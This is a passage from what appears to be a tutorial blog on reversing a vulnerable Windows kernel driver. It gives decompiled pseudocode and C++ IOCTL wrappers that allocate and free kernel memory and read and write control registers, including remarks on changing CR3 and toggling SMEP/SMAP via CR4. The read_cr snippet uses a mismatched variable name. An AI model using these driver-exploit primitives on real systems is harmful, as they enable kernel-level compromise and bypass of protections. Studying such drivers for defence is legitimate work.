<h2 id="allocate-contiguous-physical-memory">Allocate contiguous physical memory</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> ( <span style="color:#f92672">*</span>(_BYTE <span style="color:#f92672">*</span>)IoStackLocation <span style="color:#f92672">!=</span> <span style="color:#ae81ff">14</span> )
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">goto</span> LABEL_132;
</span></span><span style="display:flex;"><span>  ControlCode <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>(_DWORD <span style="color:#f92672">*</span>)(IoStackLocation <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x18</span>);
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> ( ControlCode <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0x222858</span> )
</span></span><span style="display:flex;"><span>  {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> ( ControlCode <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0x22287C</span> )
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">switch</span> ( ControlCode )
</span></span><span style="display:flex;"><span>      {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">case</span> <span style="color:#ae81ff">0x222880u</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>          StatusCode <span style="color:#f92672">=</span> sub_11F48((_UNICODE_STRING <span style="color:#f92672">*</span>)SystemBuffer);
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">*</span>(_DWORD <span style="color:#f92672">*</span>)(Irp <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x30</span>) <span style="color:#f92672">=</span> StatusCode;
</span></span><span style="display:flex;"><span>          <span style="color:#66d9ef">if</span> ( StatusCode <span style="color:#f92672">&lt;</span> <span style="color:#ae81ff">0</span> )
</span></span></code></pre></div><p>This code snippet teaches us more about how control codes are used to allow a user-mode application to specify what operations they want to get executed. If I wanted <code>sub_11F48</code> to be called, I would pass in the control code <code>0x222880u</code> to <code>DeviceIoControl</code>. Below you can see the logic of <code>sub_11F48</code> in the psuedocode, keep in mind the argument passed to it - which is the buffer that data gets written to/read from. This is the first communication structure we will recreate.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span>NTSTATUS <span style="color:#66d9ef">__fastcall</span> <span style="color:#a6e22e">sub_11F48</span>(<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> <span style="color:#f92672">*</span>CommunicationBuffer)
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">__int64</span> ContiguousMemorySpecifyCache; <span style="color:#75715e">// rax
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">*</span>((QWORD <span style="color:#f92672">*</span>)CommunicationBuffer <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>) <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>i64;
</span></span><span style="display:flex;"><span>  ContiguousMemorySpecifyCache <span style="color:#f92672">=</span> MmAllocateContiguousMemorySpecifyCache(
</span></span><span style="display:flex;"><span>                                   <span style="color:#f92672">*</span>CommunicationBuffer,
</span></span><span style="display:flex;"><span>                                   <span style="color:#ae81ff">0x100000</span>,
</span></span><span style="display:flex;"><span>                                   <span style="color:#ae81ff">4026531840</span>,
</span></span><span style="display:flex;"><span>                                   <span style="color:#ae81ff">0x10000</span>,
</span></span><span style="display:flex;"><span>                                   <span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span>                                   
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">*</span>((QWORD <span style="color:#f92672">*</span>)CommunicationBuffer <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>) <span style="color:#f92672">=</span> ContiguousMemorySpecifyCache;
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> ( not ContiguousMemorySpecifyCache ) <span style="color:#66d9ef">return</span> STATUS_UNSUCCESSFUL;
</span></span><span style="display:flex;"><span>    
</span></span><span style="display:flex;"><span>  CommunicationBuffer[<span style="color:#ae81ff">1</span>] <span style="color:#f92672">=</span> MmGetPhysicalAddress(ContiguousMemorySpecifyCache);
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>i64;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The first important thing we should take notice of in this psuedocode is the write to <code>CommunicationBuffer + 1</code>. In C, we know that an array is just a pointer to the first element in a range of contiguous elements, so  <code>*((QWORD *)CommunicationBuffer + 1)</code> must be identical to <code>CommunicationBuffer[1]</code>. So straight away, we know when this dispatch routine handler is invoked, it takes the input buffer and makes a write 8 bytes down with the value 0. The use and type of the previous 8 bytes below the starting address of the write are currently unknown. They could be two 32-bit integers, one 64-bit integer, 8 8-bit integers etc; right now we just know that 8 bytes down the start of the buffer is a 64-bit integer, because of the 0i64 written into it. Now you may have falsely made the assumption that because 8 bytes down the buffer is a 64-bit integer, the first subobject in this contiguous buffer is guaranteed to be a 64-bit integer, because arrays always consists of subojects of the same type. However, it is not mandatory that the buffer in <code>METHOD_BUFFERED</code> <code>IOCTL</code> operations must be an array. They can be structures or trivial classes in which the space occupied by each suboject in the buffer differs, an array of heterogenous objects - this is actually quite common. So, when deducing the type of an element in the buffer/communication structure, it should not be generalised based on the type of one of its members in the contiguous array, but how it is used within the dispatch routine (or the routine called by the dispatch routine that maps to the control code specified). In this case, the subojects are of the same type, so the buffer can be constructed as a normal array. I came to this conclusion by looking at the use of the first subobject, and we see it&rsquo;s the first argument in <code>MmAllocateContiguousMemorySpecifyCache</code>. The documentation for this routine states that this argument should be of type <code>int64</code>, which is the same type as the second subobject in the buffer. Furthermore, the purpose of this argument is to represent the amount of bytes that should be allocated with <code>MmAllocateContiguousMemorySpecifyCache</code>, so the first subobject in our buffer should be representative of this. The use of the second argument is better understood if the buffer were manipulated structurally, so I&rsquo;ve casted the buffer to a <code>UNICODE_STRING</code>, which you can see below, along with the layout of <code>UNICODE_STRING</code></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span><span style="color:#66d9ef">struct</span> <span style="color:#a6e22e">_UNICODE_STRING</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    USHORT Length;                                                          <span style="color:#75715e">//0x0
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    USHORT MaximumLength;                                                   <span style="color:#75715e">//0x2
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    WCHAR<span style="color:#f92672">*</span> Buffer;                                                          <span style="color:#75715e">//0x8
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>}; 
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>NTSTATUS <span style="color:#66d9ef">__fastcall</span> <span style="color:#a6e22e">sub_11F48</span>(_UNICODE_STRING <span style="color:#f92672">*</span>CommunicationBuffer)
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  WCHAR <span style="color:#f92672">*</span>ContiguousMemorySpecifyCache; <span style="color:#75715e">// rax
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>  CommunicationBuffer<span style="color:#f92672">-&gt;</span>Buffer <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>i64;
</span></span><span style="display:flex;"><span>  ContiguousMemorySpecifyCache <span style="color:#f92672">=</span> (WCHAR <span style="color:#f92672">*</span>)MmAllocateContiguousMemorySpecifyCache(
</span></span><span style="display:flex;"><span>                                            <span style="color:#f92672">*</span>(<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> <span style="color:#f92672">*</span>)<span style="color:#f92672">&amp;</span>CommunicationBuffer<span style="color:#f92672">-&gt;</span>Length,
</span></span><span style="display:flex;"><span>                                            <span style="color:#ae81ff">0x100000</span>i64,
</span></span><span style="display:flex;"><span>                                            <span style="color:#ae81ff">4026531840</span>i64,
</span></span><span style="display:flex;"><span>                                            <span style="color:#ae81ff">0x10000</span>i64,
</span></span><span style="display:flex;"><span>                                            <span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span>  CommunicationBuffer<span style="color:#f92672">-&gt;</span>Buffer <span style="color:#f92672">=</span> ContiguousMemorySpecifyCache;
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> ( <span style="color:#f92672">!</span>ContiguousMemorySpecifyCache ) <span style="color:#66d9ef">return</span> STATUS_UNSUCCESSFUL;
</span></span><span style="display:flex;"><span>  
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">*</span>(_DWORD <span style="color:#f92672">*</span>)(<span style="color:#f92672">&amp;</span>CommunicationBuffer<span style="color:#f92672">-&gt;</span>MaximumLength <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>) <span style="color:#f92672">=</span> 
</span></span><span style="display:flex;"><span>  				MmGetPhysicalAddress(ContiguousMemorySpecifyCache);
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span> }
</span></span></code></pre></div><p>We initially see nothing unusual, there is a write to 8 bytes down (<code>UNICODE_STRING-&gt;Buffer</code>) the beginning of the buffer with the return value of <code>MmAllocateContiguousMemorySpecifyCache</code>, which is the start of the system virtual memory that we allocated - this is what we expected. However, we later then see <code>*(DWORD *)(&amp;CommunicationBuffer-&gt;MaximumLength + 1)</code> - which is <code>*((QWORD *)CommunicationBuffer + (1/2))</code> - being written to with the physical address, meaning the last 32 bits of the first subobject within the buffer gets overwritten from the amount of memory we want to allocate to the 32 bits from the physical address returned by <code>MmGetPhysicalAddress</code>. This is interesting, because it indicates to us that our communication structure should be not be an array of 2 int64s, but 2 int32s and 1 int64. The first subobject of type int32 in our buffer should specify the size, as usual. The second subobject of type int32 should represent 32 bits from the physical address that maps to the kernel memory we allocated, and the third (int64) should remain the same (return value of <code>MmAllocateContiguousMemorySpecifyCache</code>). This way, no bytes are overwritten. However, the price to pay for this structural change is that the maximum amount of memory that could be possibly allocated has been truncated to <code>(2 ^ 32)</code>, from <code>(2 ^ 64)</code>, which is fortunately still a lot of memory. So now, we have two possible options for our communication structure that will server as the <code>InputBuffer</code> to <code>DeviceIoControl</code>. If you somehow haven&rsquo;t noticed already, size is the only member/suboject we have to specify, and our driver returns to us the physical address and start of the kernel virtual range.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c++" data-lang="c++"><span style="display:flex;"><span><span style="color:#75715e">// case 1 (no bytes are overwritten but maximum memory that can be allocated is truncated):
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#pragma pack(push, 1)
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#a6e22e">_ALLOCATE_CONTIGUOUS_MEMORY</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>   <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> Size;
</span></span><span style="display:flex;"><span>   <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> PhysicalAddress_32bits;
</span></span><span style="display:flex;"><span>   <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span> KernelVirtualMemoryBuffer;
</span></span><span style="display:flex;"><span>}ALLOCATE_CONTIGUOUS_MEMORY, <span style="color:#f92672">*</span> PALLOCATE_CONTIGUOUS_MEMORY;
</span></span><span style="display:flex;"><span><span style="color:#75715e">#pragma pack(pop)
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// case 2 (bytes get overwritten but more memory can be allocated):
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>DWORDLONG InputArg[<span style="color:#ae81ff">2</span>];
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// case 2 represented as a structure:
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#pragma pack(push, 1)
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#a6e22e">_ALLOCATE_CONTIGUOUS_MEMORY</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>   <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span> Size_And_Physical;
</span></span><span style="display:flex;"><span>   <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span> KernelVirtualMemoryBuffer;
</span></span><span style="display:flex;"><span>}ALLOCATE_CONTIGUOUS_MEMORY, <span style="color:#f92672">*</span> PALLOCATE_CONTIGUOUS_MEMORY;
</span></span><span style="display:flex;"><span><span style="color:#75715e">#pragma pack(pop)
</span></span></span></code></pre></div><p>Now we have all the information we need to talk to our vulnerable driver and force it to allocate kernel space virtual memory that is contiguous in physical memory. We have our handle to the device object, we have the communcation structures properly set up and we have the correct control code. Below shows a code snippet using the second communication structure discussed above.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#a6e22e">_OUTPUT_INFORMATION</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> PhysicalAddress_32bits;
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span> KernelVirtualMemoryBuffer;
</span></span><span style="display:flex;"><span>} OUTPUT_INFORMATION, <span style="color:#f92672">*</span> POUTPUT_INFORMATION;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">bool</span> <span style="color:#a6e22e">allocate_kernel_memory</span>(<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">__int64</span> size, OUTPUT_INFORMATION<span style="color:#f92672">&amp;</span> info)
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>	<span style="color:#75715e">// array of 64-bit integers
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>	std<span style="color:#f92672">::</span>remove_reference<span style="color:#f92672">&lt;</span> <span style="color:#66d9ef">decltype</span>( size ) <span style="color:#f92672">&gt;::</span>type input_buffer[<span style="color:#ae81ff">2</span>];
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e">// set the first suboject in the array to the amount of memory we want to allocate
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>	<span style="color:#f92672">*</span>input_buffer <span style="color:#f92672">=</span> size;
</span></span><span style="display:flex;"><span>    
</span></span><span style="display:flex;"><span>	<span style="color:#75715e">// send a message to the driver to allocate kernel memory using the ctl code
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>	<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> bytes_returned <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">if</span> (not DeviceIoControl(drv_handle, <span style="color:#ae81ff">0x222880</span>, <span style="color:#f92672">&amp;</span>input_buffer, <span style="color:#66d9ef">sizeof</span>(input_buffer),
</span></span><span style="display:flex;"><span>		<span style="color:#f92672">&amp;</span>input_buffer, <span style="color:#66d9ef">sizeof</span>(input_buffer), <span style="color:#f92672">&amp;</span>bytes_returned, <span style="color:#66d9ef">nullptr</span>)) <span style="color:#66d9ef">return</span> false;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	info.KernelVirtualMemoryBuffer <span style="color:#f92672">=</span> input_buffer[<span style="color:#ae81ff">1</span>];
</span></span><span style="display:flex;"><span>	info.PhysicalAddress_32bits <span style="color:#f92672">=</span> (<span style="color:#f92672">*</span>input_buffer) <span style="color:#f92672">&amp;</span> <span style="color:#ae81ff">0xFFFFFFFF</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">return</span> true;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The virtual memory manager does not ensure memory allocated in system space will not exceed the lifetime of the component that allocated it. This means using a vulnerable driver to allocate memory puts us at risk of a memory leak, when we unload the driver without freeing any memory, all our allocations are still active. Luckily, this driver exposes <code>MmFreeContiguousMemorySpecifyCache as well</code>. Before we move on, we should note that the protection of this allocated memory is not necessarily <code>RWX</code>. With virtualisation based security (<code>VBS</code>) &amp; memory integrity (<code>HVCI</code>) enabled, <code>EPTEs</code> trump the normal description placed on virtual memory by <code>PTEs</code>, ensuring that no kernel page, except special kernel pages, can be <code>RWX</code>. This blog isn&rsquo;t at all about these topics, so we should move on, just note that these security mechanisms are enabled on default windows 11.</p>
<h2 id="free-contiguous-memory">Free Contiguous Memory</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span>        <span style="color:#66d9ef">case</span> <span style="color:#ae81ff">0x222884u</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>          MmFreeContiguousMemorySpecifyCache(<span style="color:#f92672">*</span>(<span style="color:#66d9ef">uint64_t</span><span style="color:#f92672">*</span>)(SystemBuffer <span style="color:#f92672">+</span> <span style="color:#ae81ff">8</span>), <span style="color:#f92672">*</span>(<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> <span style="color:#f92672">*</span>)SystemBuffer, <span style="color:#ae81ff">0</span>i64);
</span></span><span style="display:flex;"><span>          <span style="color:#66d9ef">goto</span> LABEL_132;
</span></span></code></pre></div><p>Using the tactics described in the previous section, we can construct our communication buffer and send a request to the vulnerable driver with the appropriate control code <code>0x222884</code>. The driver allows us to specify the range (size) we want to free, which will be the second subobject in the buffer, and of course the starting address of the buffer that is to be freed, which will be the first. Like last time, we can pass a normal array or a structure, but the maximum number of subobjects is 2. The structure would consist of an int32 and an <code>int64</code> in that order, and the array would have to be of type <code>int64</code>. I will show the code example below using a structure this time, so we know how to communicate in both ways.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span><span style="color:#75715e">#pragma pack(push, 1)
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#a6e22e">_FREE_CONTIGUOUS_MEMORY</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span> StartingVA;
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> Size;
</span></span><span style="display:flex;"><span>} FREE_CONTIGUOUS_MEMORY, <span style="color:#f92672">*</span> PFREE_CONTIGUOUS_MEMORY;
</span></span><span style="display:flex;"><span><span style="color:#75715e">#pragma pack(pop)
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">free_kernel_memory</span>(<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">__int32</span> size, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">__int64</span> starting_va)
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>	<span style="color:#75715e">// set up the structure
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>	FREE_CONTIGUOUS_MEMORY buffer{};
</span></span><span style="display:flex;"><span>	buffer.StartingVA <span style="color:#f92672">=</span> starting_va;
</span></span><span style="display:flex;"><span>	buffer.Size <span style="color:#f92672">=</span> size;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e">// tell our vuln driver to free memory
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>	DWORD bytes_returned{};
</span></span><span style="display:flex;"><span>	DeviceIoControl(drv_handle, <span style="color:#ae81ff">0x222884</span>, <span style="color:#f92672">&amp;</span>buffer, 
</span></span><span style="display:flex;"><span>    		<span style="color:#66d9ef">sizeof</span>(buffer), <span style="color:#f92672">&amp;</span>buffer, <span style="color:#66d9ef">sizeof</span>(buffer), <span style="color:#f92672">&amp;</span>bytes_returned, <span style="color:#66d9ef">nullptr</span>);
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Now you have a basic understanding of reversing the dispatch routine to recreate communication structures, we&rsquo;ll advanced to our next vulnerability: read &amp; write control registers.</p>
<h2 id="readwrite-control-registers">Read/Write Control Registers</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> ( <span style="color:#f92672">!</span>v79 )
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> ( <span style="color:#f92672">*</span>(_DWORD <span style="color:#f92672">*</span>)SystemBuffer ) {
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">switch</span> ( <span style="color:#f92672">*</span>(_DWORD <span style="color:#f92672">*</span>)SystemBuffer )
</span></span><span style="display:flex;"><span>            {
</span></span><span style="display:flex;"><span>              <span style="color:#66d9ef">case</span> <span style="color:#ae81ff">2</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>                CurrentIrql <span style="color:#f92672">=</span> __readcr2();
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>              <span style="color:#66d9ef">case</span> <span style="color:#ae81ff">3</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>                CurrentIrql <span style="color:#f92672">=</span> __readcr3();
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>              <span style="color:#66d9ef">case</span> <span style="color:#ae81ff">4</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>                CurrentIrql <span style="color:#f92672">=</span> __readcr4();
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>              <span style="color:#66d9ef">case</span> <span style="color:#ae81ff">8</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>                CurrentIrql <span style="color:#f92672">=</span> KeGetCurrentIrql();
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>              <span style="color:#66d9ef">default</span><span style="color:#f92672">:</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">*</span>(_QWORD <span style="color:#f92672">*</span>)(Irp <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x38</span>) <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>i64;
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">*</span>(_DWORD <span style="color:#f92672">*</span>)(Irp <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x30</span>) <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xC0000001</span>;
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">goto</span> LABEL_132;
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>            CurrentIrql <span style="color:#f92672">=</span> __readcr0();
</span></span><span style="display:flex;"><span>    }
</span></span></code></pre></div><p>From this image, we can see that the first subobject within the communication buffer should represent the control register we want to read from. We aren&rsquo;t allowed to read every control register that there is, and in the case we pass an option that is not present, our driver returns to us the <code>STATUS_UNSUCCESSFUL</code> <code>NTSTATUS</code> error code. We are also allowed to obtain the current <code>IRQL</code>, which is just a read from <code>cr8</code>. The read <code>cr3</code> privilege exposed would work well with the map physical &amp; read/write vulnerability that we will inspect later, but unfortunately there are some security mitigations involving <code>MmMapIoSpace</code> that prevent us from mapping page tables, but you could try on older versions of windows. The only ambiguity associated with this vulnerability is its control code, due to the way the psuedocode is presented to us. Luckily, deciphering it is just a matter of adding numbers. We can see that the condition for this vulnerability to be executed is satisfied when <code>v79</code> is 0. I&rsquo;ve highlighted all the lines associated with <code>v79</code>, whether explicitly or not, until we have a hardcoded value. Using this techqniue, we know that <code>ControlCode - 2238556 - 16 = 0</code>, and so we make ControlCode the subject of the equation to get its value. We subtract 16 because it is the product of 4*4, since 4 was subtracted from the original control code 4 times. Now we know that our control code is <code>2238572</code> or <code>0x22286C</code> for reading control registers, we can send a request to our driver.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span><span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">__int64</span> <span style="color:#a6e22e">read_cr</span>(<span style="color:#66d9ef">uint64_t</span> control_reg)
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">uint64_t</span> InputBuffer[<span style="color:#ae81ff">2</span>];
</span></span><span style="display:flex;"><span>	<span style="color:#f92672">*</span>InputBuffer <span style="color:#f92672">=</span> ControlRegister;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	DWORD bytes_returned;
</span></span><span style="display:flex;"><span>	DeviceIoControl(drv_handle, <span style="color:#ae81ff">2238572</span>, <span style="color:#f92672">&amp;</span>InputBuffer, 
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">sizeof</span>(InputBuffer), <span style="color:#f92672">&amp;</span>InputBuffer, <span style="color:#66d9ef">sizeof</span>(InputBuffer),
</span></span><span style="display:flex;"><span>     <span style="color:#f92672">&amp;</span>bytes_returned, <span style="color:#66d9ef">nullptr</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">return</span> InputBuffer[<span style="color:#ae81ff">1</span>];
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>At this point, you can see how easy it is to exploit vulnerable drivers. For the following vulnerabilities that are exploited similarly to the ones described in the previous section, I&rsquo;ll just be showing the disassembly or psuedocode with a basic description, along with the communication structures and a function demonstrating communication.</p>
<p>Being able to write to control registers is a very powerful vulnerability. For example, when we load <code>CR3</code> with a different physical address, we establish a whole new &amp; different <code>VA -&gt; PA</code> translation - we  are, in essence, in a new virtual address space. We can also see that we can change the <code>IRQL</code> (<code>writecr8</code>), though user-mode code is always executed at passive level, and so are most dispatch routines. We should not forget about <code>CR4</code>, with which we can toggle <code>SMEP/SMAP</code> (not reliable on newer versions of windows). With great power comes great responsibility, so this set of vulnerabilities should be used under extreme caution, for your own device&rsquo;s safety. The structure for this communication buffer is identical to the first one, but this time there is no data returned to us from the driver, and we have to populate each &amp; every subobject with a value. The first being the control register we want to write to, and the second, the value to be written. For the sake of brevity, we will continue to use an array as our communication buffer.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span><span style="color:#66d9ef">bool</span> <span style="color:#a6e22e">write_cr</span>(<span style="color:#66d9ef">uint64_t</span> ControlRegister, DWORDLONG NewValue)
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">uint64_t</span> InputArg[<span style="color:#ae81ff">2</span>];
</span></span><span style="display:flex;"><span>	<span style="color:#f92672">*</span>InputArg <span style="color:#f92672">=</span> ControlRegister;
</span></span><span style="display:flex;"><span>	InputArg[<span style="color:#ae81ff">1</span>] <span style="color:#f92672">=</span> NewValue;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	DWORD bytes_returned;
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">return</span> DeviceIoControl(drv_handle, <span style="color:#ae81ff">2238576</span>, <span style="color:#f92672">&amp;</span>InputArg, 
</span></span><span style="display:flex;"><span>    	<span style="color:#66d9ef">sizeof</span>(InputArg), <span style="color:#f92672">&amp;</span>InputArg, <span style="color:#66d9ef">sizeof</span>(InputArg),
</span></span><span style="display:flex;"><span>         <span style="color:#f92672">&amp;</span>bytes_returned, <span style="color:#66d9ef">nullptr</span>);
</span></span><span style="display:flex;"><span>}
